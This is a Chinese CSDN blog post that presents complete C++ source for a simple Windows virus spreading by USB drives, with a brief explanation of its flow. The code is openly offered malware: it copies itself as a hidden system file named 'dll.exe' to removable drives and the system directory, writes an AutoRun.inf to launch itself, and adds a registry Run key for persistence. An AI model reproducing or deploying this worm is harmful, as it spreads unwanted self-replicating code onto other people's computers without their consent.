基于U盘传播的简单病毒

最新推荐文章于 2021-07-25 16:16:48 发布
最新推荐文章于 2021-07-25 16:16:48 发布
阅读量568 收藏 9
点赞数 1
分类专栏: c++
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/chy2z/article/details/80080107
版权

  
#include <windows.h>
#include <Shlwapi.h>
#include <fstream.h>
#include <TlHelp32.h>

#define TIMER 1//计时器
#define WM_FROMC      WM_USER+0          //自定义消息 从C盘中启动
#define WM_FROMU      WM_USER+1   //自定义消息 从U盘中启动

//function
LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口过程


//病毒从U盘启动时用到的函数
BOOL FileExist(TCHAR *path);//测试一个文件是否存在
BOOL GetSelfPath(TCHAR *path);//Get the virus's path
BOOL FindU(TCHAR *u);//check whether u exist, u[2]
BOOL GetSysPath(TCHAR *path);//得到系统路径
BOOL CopyToSysAndSet(HWND hwnd);//复制自身到系统目录和设置
BOOL SetFileAttrib(TCHAR *path);//设置path所指文件的属性
BOOL RegAutoRun(TCHAR *path);//修改注册表,实现自启动

//从C盘启动时用到函数
BOOL CopyToUAndSet();//复制自己到U盘
BOOL CreateAutoRunFile(TCHAR *path);//在U盘下生成autorun.inf文件
BOOL FindSelf();//测试自己是否在已经执行了

//global variable
TCHAR szExePath[MAX_PATH];//the virus's path
TCHAR U[2];//保存U盘的盘符
TCHAR szSysPath[MAX_PATH];//system path

//constant
const TCHAR *szExeName="dll.exe";
const TCHAR *szAutoRunFile="AutoRun.inf";

int WINAPI WinMain (HINSTANCE hInstance, HINSTANCE hPrevInstance,
                       PSTR szCmdLine, int iCmdShow)
{
static TCHAR szAppName[]=TEXT ("virus");
HWND                   hwnd;
MSG                    msg;
WNDCLASS               wndclass;

wndclass.style                =0;
wndclass.lpfnWndProc          =WndProc;
wndclass.cbClsExtra           =0;
wndclass.cbWndExtra           =0;
wndclass.hInstance            =hInstance;
wndclass.hIcon                =0;
wndclass.hCursor              =0;
wndclass.hbrBackground        =0;
wndclass.lpszMenuName         =NULL;
wndclass.lpszClassName        =szAppName;

RegisterClass (&wndclass);


hwnd = CreateWindow (szAppName, NULL,
                        WS_DISABLED,
                        0, 0,
                        0, 0,
                        NULL, NULL, hInstance, NULL);
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage (&msg);
DispatchMessage (&msg);
}
return msg.wParam;
}

LRESULT CALLBACK WndProc (HWND hwnd, UINT message, WPARAM wParam,LPARAM lParam)
{
switch(message)
{
case WM_CREATE:               //处理一些要下面要用到的全局变量
GetSysPath(szSysPath);//得到系统路径
SetTimer(hwnd,TIMER,5000,0);//启动计时器
GetSelfPath(szExePath);//得到自身的路径
return 0;
case WM_TIMER:                 //timer message
if(szExePath[0]=='C')
{
if(FindU(U))
{
SendMessage(hwnd,WM_FROMC,0,0);
}
}
else
SendMessage(hwnd,WM_FROMU,0,0);
return 0;
case WM_FROMC:
CopyToUAndSet();
return 0;
case WM_FROMU:
CopyToSysAndSet(hwnd);
return 0;
case WM_DESTROY:
KillTimer(hwnd,TIMER);
PostQuitMessage(0);
return 0;
}
return DefWindowProc(hwnd, message, wParam, lParam);
}

BOOL GetSelfPath(TCHAR *path)
{
if(GetModuleFileName(NULL,path,MAX_PATH))//得到程序自身的目录
{
return TRUE;
}
else
return FALSE;
}

BOOL FindU(TCHAR *u)
{
u[1]=':';
for(char d='C';d<='Z';d++)//遍历C到Z
       {
           u[0]=d;
           if(GetDriveType(u)==DRIVE_REMOVABLE)//判断是不是可移动的盘
                 return TRUE;  


}
return FALSE;
}

BOOL GetSysPath(TCHAR *path)
{
return GetSystemDirectory(path,MAX_PATH);//得到系统路径
}

BOOL CopyToSysAndSet(HWND hwnd)
{
TCHAR szPath[MAX_PATH];
lstrcpy(szPath,szSysPath);
lstrcat(szPath,"\\");
lstrcat(szPath,szExeName);//得到复制到系统目录的完整目录
if(!FileExist(szPath))//检测是否已经存在复制的文件
{
CopyFile(szExePath,szPath,FALSE);
RegAutoRun(szPath);
return SetFileAttrib(szPath);
}
else
{
if(!FindSelf())//检测自己有没有运行
WinExec(szPath,SW_HIDE);//没有就执行
SendMessage(hwnd,WM_CLOSE,0,0);结束自己
}
return FALSE;
}

BOOL FileExist(TCHAR *path)//检测PATH所指的路径的文件是否存在
{
int result;
result=PathFileExists(path);
if(result==1)
return TRUE;
else
return FALSE;
}
BOOL SetFileAttrib(TCHAR *path)
{
return SetFileAttributes(path,FILE_ATTRIBUTE_SYSTEM|FILE_ATTRIBUTE_HIDDEN);
}
BOOL RegAutoRun(TCHAR *path)//修改注册表
{
HKEY hkey;
if(RegOpenKey(HKEY_LOCAL_MACHINE,"SOFTWARE\\MICROSOFT\\Windows\\CurrentVersion\\Run",
&hkey)==ERROR_SUCCESS)
{
RegSetvalueEx(hkey,szExeName,0,REG_SZ,(BYTE*)path,lstrlen(path));
RegCloseKey(hkey);
return TRUE;
}
else
return FALSE;
}
BOOL CopyToUAndSet()
{
TCHAR szPath[MAX_PATH];
lstrcpy(szPath,U);
lstrcat(szPath,"\\");
lstrcat(szPath,szExeName);//得到指向U盘的完整目录

TCHAR szAutoFile[MAX_PATH];
lstrcpy(szAutoFile,U);
lstrcat(szAutoFile,"\\");
lstrcat(szAutoFile,szAutoRunFile);

if(!FileExist(szAutoFile))
{
CreateAutoRunFile(szAutoFile);
SetFileAttrib(szAutoFile);
}
if(!FileExist(szPath))
{
CopyFile(szExePath,szPath,FALSE);
return SetFileAttrib(szPath);
}
return FALSE;
}

BOOL CreateAutoRunFile(TCHAR *path) //在U盘下创建一个autorun.inf文件
{
ofstream fout;
fout.open(path);
if(fout)
{
fout<<"[AutoRun]"<<endl;
fout<<"open=dll.exe e"<<endl;
fout<<"shellexecute=dll.exe e"<<endl;
fout<<"shell\\Auto\\command=dll.exe e"<<endl;
fout<<"shell=Auto"<<endl;
fout.close();
return TRUE;
}
return FALSE;
}

BOOL FindSelf(){
PROCESSENTRY32 pe;
HANDLE hShot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
pe.dwSize=sizeof(PROCESSENTRY32);
if(Process32First(hShot,&pe)){
do{
if(lstrcmp(pe.szExeFile,szExeName)==0)
{
CloseHandle(hShot);
return TRUE;
}
}while(Process32Next(hShot,&pe));
}
CloseHandle(hShot);
return FALSE;
}


程序的大致流程如下:
首先得到一些全局变量的值:系统路径,程序自身的路径.启动定时器
判断自己程序的目录
如果是在C盘,则监测有没有U盘出现,如果有的,检测U盘中是否有dll.exe文件.没有就复制自己到U盘.设置文件的属性为隐藏和系统
如果是在不是在C盘启动,则复制自己到U盘,修改注册表实现自启动,并设置文件的属性为隐藏和系统.


黑暗行动
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
20211915 2022-2023-5 《网络攻击与防护》实验八报告
ashoreG的博客
05-06 584
网络攻击与防护实验八
U盘病毒传播途径和如何安全使用U盘
syspro的专栏
03-28 2831
        现在U盘应用的非常广泛,使用电脑的人几乎人手一个。U盘在给我们带来方便的同时,也给病毒木马的传播提供了方便。下面我将就U盘病毒传播途径和如何安全使用U盘来谈谈我自己的认生,欢迎批评指正。        一、U盘病毒的主要传播途径。   通过自动播放传播。这是U盘病毒的主要传播方式。病毒通过在U盘中写入AutoRun.inf文件(如下),并写入病毒木马。如果用户没有关
linux病毒通过U盘传播,一个通过U盘传播病毒详细分析,近期抓的但是是09年的病毒...
weixin_36089077的博客
05-10 180
本帖最后由 清香白莲 于 2017-8-30 10:30 编辑1.介绍sample_sha1:0c9dec73697f74a8657e538eef8016a515e6cbc0图标:图标.png (2 KB, 下载次数: 11)2017-7-15 17:40 上传传播途径:U盘,硬盘该样本是某个群友在自己学校打印店里抓到的虫子。VT上显示最早上传时间是2009年。样本本身是Delphi程序,但是会释...
感染U盘程序(C++代码)
09-15
感染U盘程序(C++代码),一个绝对值得一学并展示在别人面前的小程序!
遭遇通过U盘传播的蠕虫Worm.Win32.Agent.aj/setup.exe等
Purpleendurer@CSDN
04-03 2694
endurer 原创2007-04-03 第1版昨天一位网友的电脑在接入U盘后,瑞星注册表监控提示有程序试图修改注册表……现在使用QQ,QQ都提示有错误,要重装一次才能用……让偶帮助检查。到 http://endurer.ys168.com下载 IceSword,发现可疑进程:c:/windows/system32/ime/svchost.exe,终止了。下载 pe_xscan 扫描
u盘病毒的认识
weixin_50753632的博客
05-25 644
在我们的工作学习生活中,我们通常会用到一个重要的东西那就是u盘,它是一种使用USB接口的无需物理驱动器的微型高容量移动存储产品,通过USB接口与电脑连接,实现即插即用。对于我们的数据拷贝传输都起到了非常重要的作用,u盘可以说是人手必备了,那么虽然它对我们的生活有非常重要的作用,随之而来的就是一些问题比如u盘病毒U盘病毒顾名思义就是通过U盘传播病毒。自从发现U盘的autorun.inf漏洞之后,U盘病毒的数量与日俱增。u盘病毒并不是只存在于u盘上,中毒的电脑每个分区下面同样有u盘病毒,电脑和u盘...
易语言源码U盘病毒专杀.rar
03-30
U盘病毒,通常称为移动存储设备病毒,主要通过USB闪存驱动器传播,对用户的个人数据安全构成威胁。 易语言的特点在于其直观的语法,以中文词汇为基础,如“打开文件”、“关闭文件”等,使得编程过程更为友好。对于...
知识大百科:U盘传播病毒的原理.docx
09-27
U盘传播病毒的原理 U盘传播病毒的原理是指利用U盘病毒传播借助autorun.inf文件的机制。...U盘传播病毒的原理是基于autorun.inf文件的机制,用户需要了解其原理和防止方法,以保护自己的计算机安全。
基于动态系统仿真的U盘病毒传播形状分析
04-18
### 基于动态系统仿真的U盘病毒传播形状分析 #### 一、引言与背景 随着信息技术的快速发展,计算机病毒成为信息安全领域的重要威胁之一。计算机病毒不仅能够破坏数据,还可能泄露敏感信息,对个人用户和企业造成...
易语言U盘病毒专杀
07-17
U盘病毒通常通过USB设备传播,一旦感染,可能对用户的文件安全造成威胁。 1. **U盘病毒专杀源码**:这是整个项目的核心部分,包含了用易语言编写的一系列函数和代码,用于识别、隔离和删除U盘中的恶意程序。源码是...
一个很简单U盘病毒
正清技术博客
08-01 800
dmyww123@  以下代码 仅供研究:#include   #include   #include     #include  char *drives[] = {"C:","D:","E","F:","G:","H:","I:","J:","K:","L:"}; char Path[MAX_PATH];DWORD WINAPI spreadUSB(
u盘传播计算机病毒的媒介,u盘病毒有几种传播方式
weixin_39883256的博客
07-25 2171
u盘病毒通过u盘向外感染病毒,而它在传播的过程中,不止一种传播方式,那么,u盘病毒有几种传播方式呢?哪些移动存储设备可以传播病毒呢?今天我们就跟随佰佰安全网一起来了解关于这方面的网络病毒小知识吧。第一,隐藏,U盘病毒的隐藏方式有很多种,包括:1、作为系统文件隐藏,一般系统文件是看不见的, 所以这样就达到了隐藏的效果;2、伪装成其他文件,由于一般计算机用户不会显示文件的后缀,或者是文件名太长看不到后...
一个简单U盘病毒
冷却
10-29 2366
/////////////////////////////////////////////////////////////一个简单U盘病毒,用C语言实现,没有破坏模块,很安全的。//这是一个强化版本,可以突破autorun.inf文件夹防御策略。//作者:冷却//注意:此程序在用VC连接的时候要设置为多线程模式。///////////////////////////////
U盘中了蠕虫病毒后清除蠕虫并恢复文件的方法
weixin_33743248的博客
05-29 5602
2019独角兽企业重金招聘Python工程师标准>>> ...
小伙利用C++实现U盘热插拨监听程序,走上人生巅峰
12-21 999
想象这样一个场景:在严重堵车的高速公路上,除了等待道路恢复畅通,似乎并没有什么更好的办法。此刻的你一定恨不得前方恰巧就是高速闸道口可以助你迅速走上人生巅峰。 VC++ U盘热插拨监听程序,自动发现U盘是否插入到电脑中,拨出U盘的动作也有监听,也可监听其它的USB设备是否有插入或拨出的动作,是一个来自于国外的U盘监听器源码。 源码测试截图: ...
U盘传播者(转)
lgb571的专栏
07-21 528
声明:代码仅做学习交流,使用后果自负#include #include #include #include #include #pragma comment(lib,"shlwapi.lib")#define TIMER 1//计时器//function LRESULT CALLBACK WndProc(HWND, UINT, WPARAM, LPARAM);//窗口过程//获取盘
U盘病毒源代码
04-07 6447
//*******************************************//******  网蝉U盘感染小病毒 ******//*******************************************//功能介绍://1,感染U盘和网络硬盘//2,释放DLL文件并将其加入到系统服务启动。//3,保护注册表相关项目。//4,//////////////////////
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值